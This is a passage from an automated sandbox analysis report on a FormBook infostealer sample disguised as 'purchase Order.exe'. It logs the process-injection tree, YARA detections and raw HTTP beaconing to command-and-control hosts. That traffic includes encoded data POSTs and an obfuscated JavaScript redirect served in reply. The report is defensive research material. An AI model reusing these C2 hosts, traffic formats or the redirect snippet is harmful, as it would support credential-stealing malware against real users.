                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 44 73 70 4f 49 61 6c 50 67 52 73 61 54 4c 66 6e 54 42 42 6a 73 68 35 4f 6e 4b 32 77 6b 75 51 36 50 62 30 38 5a 56 39 4d 62 70 34 39 46 30 74 6f 30 55 77 33 33 51 67 71 46 46 57 4c 34 50 36 7a 66 48 4c 6a 66 66 70 45 6c 2b 41 65 53 38 52 44 67 6c 63 61 77 61 59 6d 7a 70 53 57 79 65 5a 35 6b 41 68 74 77 43 78 51 79 6a 4a 75 79 54 69 65 73 37 66 34 4f 70 62 50 32 71 72 43 77 73 79 6c 4d 71 62 66 36 48 49 70 43 51 52 48 71 37 77 59 2f 4a 2f 55 53 57 79 64 50 6a 4e 76 34 70 55 [TRUNCATED]
                                                      Data Ascii: 6vSXrZxp=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYBxAv8hh2ZfT/+WaHHJUzn1pnF0NZHXx2Khq4e8+qOvsY3m5/j+BAwQ4Gh0D3Of8f34mriWfPlDbkTOlVUfv9cFtlOtS4dAm2eeAMmaNVSwBKCZ1ZJWIlUKduM4+bC7zuzDspOIalPgRsaTLfnTBBjsh5OnK2wkuQ6Pb08ZV9Mbp49F0to0Uw33QgqFFWL4P6zfHLjffpEl+AeS8RDglcawaYmzpSWyeZ5kAhtwCxQyjJuyTies7f4OpbP2qrCwsylMqbf6HIpCQRHq7wY/J/USWydPjNv4pUa2jthQ9+xx4mXXL/bshwJeHaFw3A5TkOsGrXBx1nCH6pn4il7krw0YylXZi9FgDO6Uv3pCatX3Z/euGoirZ0hLi6ebpLzzfVDXgbD6O6zKz46rTVxcGQRuNuFeTayzZ1sy4dsUMOLqDFjirPW/Lktn2+6m/p+YgcxyFn1cMOVYiaEUFx7aOUJFuS103E1o0C3Ln/NgozyXnhtwjKujqn3ihHOg3/XRexSW7HV7fCoGJLWw7wj+psk0UXuENcpWs2uNpsD04IqxegGcq3YWd6eHYhSV/1EiP5uAmJJ+Z2PblgqD3GiWS82BNxMQ1fkbd7AWFBB/uapvfIAx9zBkkmn4dUaXCa35ZUOlJSBku6o78YOpZYJEnX3+dKhgZlpcgeUs0LNlNGwUuWfySm/2VwYnXWB9fXiFWLAHxAYboqv4AXPR++LS/mmY4OQCm1twEyd+kuVm5ioyCBHFbehYG+jHx4jok58XDA/L9qQ1Q8IuQP9y/pQEMZDd47f//rQ4JhJM58aa5gGtCAmmvp9fI6/wPETRZh+ANyZH1HLSsuM5SwJXvWvfRUs8V2+WtXTm5rqNd8/kDiN0iMYqthJ54N/fIaJNEMjOJDcLPmByEeRZ6Os8rcDf9/TsQk0BWbBcUnRh1Jjf1DSpS8+mOZ9BZog3Tkm+i7elCkUj [TRUNCATED]
                                                      Nov 24, 2024 08:15:05.598087072 CET1075INHTTP/1.1 404 Not Found
                                                      Date: Sun, 24 Nov 2024 07:15:05 GMT
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gXWTKEGLRqfcyBwiX4pCmTtofiGyZYeR27Mpug%2B2YB%2BxrqJ7D6o90by5dKrQQJ7bQDcRtRGr1jTXSBKZ8vDGDjFnXswCTWbrVJt32Nry6RFHmb861Srs521EEho%2BHPn51glcH6L7w9Y%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8e779b14fafc431c-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.949998172.67.167.146801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:15:06.822534084 CET483OUTGET /o362/?6vSXrZxp=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqTlrKzSCDFFwXYzga3uqvdEw6tCWfOw==&av=Zj6TS2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US
                                                      Host: www.rgenerousrs.store
                                                      Connection: close
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Nov 24, 2024 08:15:08.315754890 CET1094INHTTP/1.1 404 Not Found
                                                      Date: Sun, 24 Nov 2024 07:15:08 GMT
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2B7F1CKoJ2kk17r2Yumv2grFmCCdZYgFwxcj47gDc1uD78MnX0bALnJu1GnBlhxQ56XC4qbL3TZmRPcN8q%2B01N0wuG5FhDwQLmBqHFq%2B3NQgfWok%2BAkf1qFwfjwVeGjBPWgoQCeR6uA%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8e779b25ee0841ff-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1725&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=483&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 31 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>10


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.949999154.88.22.110801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:15:14.023761034 CET738OUTPOST /jhb8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.t91rl7.pro
                                                      Origin: http://www.t91rl7.pro
                                                      Referer: http://www.t91rl7.pro/jhb8/
                                                      Cache-Control: no-cache
                                                      Content-Length: 197
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 53 6d 43 6b 30 43 74 78 41 44 47 68 68 69 70 33 75 65 62 6f 66 6d 33 4a 6e 56 76 6f
                                                      Data Ascii: 6vSXrZxp=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/SmCk0CtxADGhhip3uebofm3JnVvo
                                                      Nov 24, 2024 08:15:15.568288088 CET364INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sun, 24 Nov 2024 07:15:15 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Encoding: gzip
                                                      Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 59 51 ee 91 26 3e 79 81 a6 be e1 41 99 89 99 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 db 5e fe f5 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 67)N.,(ON,VPV/Ji%IAf>YQ&>yAf.6P^Z0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.950000154.88.22.110801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:15:16.686587095 CET762OUTPOST /jhb8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.t91rl7.pro
                                                      Origin: http://www.t91rl7.pro
                                                      Referer: http://www.t91rl7.pro/jhb8/
                                                      Cache-Control: no-cache
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 33 75 67 79 6d 41 34 6e 51 72 59 45 4b 44 73 78 47 48 46 47 65 6c 55 6b 41 64 49 67 3d 3d
                                                      Data Ascii: 6vSXrZxp=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKx3ugymA4nQrYEKDsxGHFGelUkAdIg==
                                                      Nov 24, 2024 08:15:18.193378925 CET364INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sun, 24 Nov 2024 07:15:17 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Encoding: gzip
                                                      Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 59 51 ee 91 26 3e 79 81 a6 be e1 41 99 89 99 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 db 5e fe f5 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 67)N.,(ON,VPV/Ji%IAf>YQ&>yAf.6P^Z0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.950001154.88.22.110801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:15:19.355782986 CET1775OUTPOST /jhb8/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.t91rl7.pro
                                                      Origin: http://www.t91rl7.pro
                                                      Referer: http://www.t91rl7.pro/jhb8/
                                                      Cache-Control: no-cache
                                                      Content-Length: 1233
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 69 48 75 31 45 65 37 59 57 6e 49 51 7a 6c 6c 67 32 58 39 78 55 4b 41 55 6e 64 32 77 65 30 46 6e 2f 6d 41 48 73 58 65 75 52 67 46 79 4b 6d 70 6c 75 48 45 45 77 73 66 50 37 63 4f 6f 30 63 4f 6b 61 35 64 6b 66 41 51 6f 65 6c 6b 66 33 71 67 59 74 2b 76 4b 61 59 2f 54 50 70 7a 72 4b 77 72 2b 69 44 2b 57 65 4c 51 55 2b 6d 77 53 56 6f 2f 4e 56 46 37 5a 74 74 72 2f 58 57 57 55 52 46 53 4b 44 61 62 56 4f 36 61 30 43 68 66 6b 50 48 65 31 35 4c 73 6a 73 4b 56 51 44 58 31 6d 38 51 55 [TRUNCATED]
                                                      Data Ascii: 6vSXrZxp=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnaE3y6Xzw3kFZv2IAWxhfxKxVCyfq7I+tsZXQgWlcTZhp03xBmlctEMXjLCy1xkYFCjqElntZwApsbYZtMyhkIUmP6IIaPMCCqrvP1hp4q1DEJWO/kAWziwMUaL3DxrfxiHu1Ee7YWnIQzllg2X9xUKAUnd2we0Fn/mAHsXeuRgFyKmpluHEEwsfP7cOo0cOka5dkfAQoelkf3qgYt+vKaY/TPpzrKwr+iD+WeLQU+mwSVo/NVF7Zttr/XWWURFSKDabVO6a0ChfkPHe15LsjsKVQDX1m8QUPCNZFvB4xMfFuWfhj/742OnP/VhvklvvYdLEY5pE1p01QtJ95jQVCd0E5GO1o882pc4M0pD12z1+pKhb6oLcy/w4JAEdlPQPydFo46FxmRhrHArn5YmdY7KFN2MtniQMopZgXN1a60exWORh2owbboVWnLAKisMrC0q31Y92pPPQGxggGHshlb2xW4y1IEF0c01bCK10o3kBGcHZf+CVE7i9yblbs/jSCTnFr2WyWe5rbEAm7qdwPsdyRJ3OXAnR4tDVxjzzvY2TXs2Zy99wtQCBhu2o4pFLciVsNKYqwPjOu11thPLRfvotGvubOPyPVRj2Lb7ahw+CTayCRx5fYcEpFEJGHdHaWO/yO1sOMAcWphPMlDwu8k/0xkSlUBVDiyfqNW9L2y08ht0KQgUXq7S3MsDQUtwcOSF4Qd16hHl/LODWcBIM+ElbaCEqkPhfkk/+v7hhc1oq8s69BH/f1x5BQHEFC/TC/aQM/xM9+GnSvPv4WuVvGu9/LiyIJEnU/ivDhrOt83Vk0XmXU0pcrfDHjsXpzJd4dA/pIK8DtDdccxpIF9UUtKKCtgwZKHREUs8ZXMLxEj7D7uQGV0/nq97fZQY59twUKRNX5Ep69STOdXSESO3hhRFekifD0a0uXASLjo1M1TtdTQMlmivp3v+PRiuK4rPnGK [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      28192.168.2.950002154.88.22.110801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:15:22.009342909 CET476OUTGET /jhb8/?6vSXrZxp=0R31+Vq/Nm8msngZkniPPNslS216pvARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmvkZEk/wC7YtB6KW2U/08aXnOShntluQ==&av=Zj6TS2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US
                                                      Host: www.t91rl7.pro
                                                      Connection: close
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Nov 24, 2024 08:15:23.516329050 CET332INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sun, 24 Nov 2024 07:15:23 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Strict-Transport-Security: max-age=31536000
                                                      Data Raw: 35 35 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 39 6a 5a 47 59 34 4c 6e 51 35 4d 57 52 69 61 69 35 77 63 6d 38 36 4f 44 6b 78 4d 51 3d 3d 27 29 3c 2f 73 63 0d 0a 35 0d 0a 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 55<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9jZGY4LnQ5MWRiai5wcm86ODkxMQ==')</sc5ript>0


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:02:12:25
                                                      Start date:24/11/2024
                                                      Path:C:\Users\user\Desktop\purchase Order.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\purchase Order.exe"
                                                      Imagebase:0xc40000
                                                      File size:1'209'344 bytes
                                                      MD5 hash:E46648BD205F6E9908880C73A9CB2847
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:02:12:27
                                                      Start date:24/11/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\purchase Order.exe"
                                                      Imagebase:0xda0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:02:12:42
                                                      Start date:24/11/2024
                                                      Path:C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe"
                                                      Imagebase:0xd60000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:5
                                                      Start time:02:12:44
                                                      Start date:24/11/2024
                                                      Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                      Imagebase:0xe70000
                                                      File size:186'880 bytes
                                                      MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:6
                                                      Start time:02:12:57
                                                      Start date:24/11/2024
                                                      Path:C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe"
                                                      Imagebase:0xd60000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:02:13:09
                                                      Start date:24/11/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff73feb0000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.8%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:7.8%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:63
